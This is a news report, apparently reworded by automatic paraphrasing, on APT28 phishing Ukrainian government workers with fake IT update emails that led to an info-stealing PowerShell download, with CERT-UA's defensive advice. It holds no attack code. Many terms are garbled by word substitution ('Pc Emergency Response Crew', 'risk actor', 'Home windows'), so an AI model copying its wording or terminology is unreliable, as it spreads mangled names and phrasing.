Russian cybercriminals have been noticed focusing on Ukrainian authorities workers with information-stealing malware by posing as IT workers working in these establishments.
Cybersecurity researchers from the Pc Emergency Response Crew of Ukraine (CERT-UA) noticed the hacking marketing campaign during which Russian state-sponsored hackers from the APT28 risk actor (often known as Fancy Bear) have been sending emails to Ukraine authorities workers.
These emails claimed to be from the federal government’s IT division, and urged them to replace their Home windows units instantly in an effort to forestall doable cyberattacks.
Posing as Ukrainians
The researchers couldn’t say how the attackers obtained this info, however to enhance their credibility, the hackers would create @outlook.com electronic mail addresses, utilizing the names of actual folks working in these organizations.
If any victims took the bait, the attackers would advise them to run a PowerShell command which, as a substitute of updating the machine, downloaded an information-stealing malware.
This malware abuses the “tasklist” and “systeminfo” instructions to reap delicate knowledge and ship them to a Mocky service API by way of an HTTP request.
To verify nobody falls for the trick, CERT-UA recommends precise IT departments prohibit the power to run PowerShell instructions on vital units and monitor community visitors for suspicious exercise, particularly if one thing’s connecting to the Mocky service API.
The Russo-Ukrainian conflict that’s been raging for greater than a yr now could be being fought on two fronts – one bodily, and one in our on-line world. Russian hackers have been arduous at work, attempting to contaminate authorities endpoints with malware, in addition to attempting to deliver down key authorities and media web sites.
The truth is, virtually two-thirds (60%) of all phishing emails that focused Ukrainian targets within the first quarter of the yr got here from Russian risk actors, Google’s Risk Evaluation Group (TAG) says. TAG additionally claims APT28 is without doubt one of the key gamers on this marketing campaign.
By way of: BleepingComputer (opens in new tab)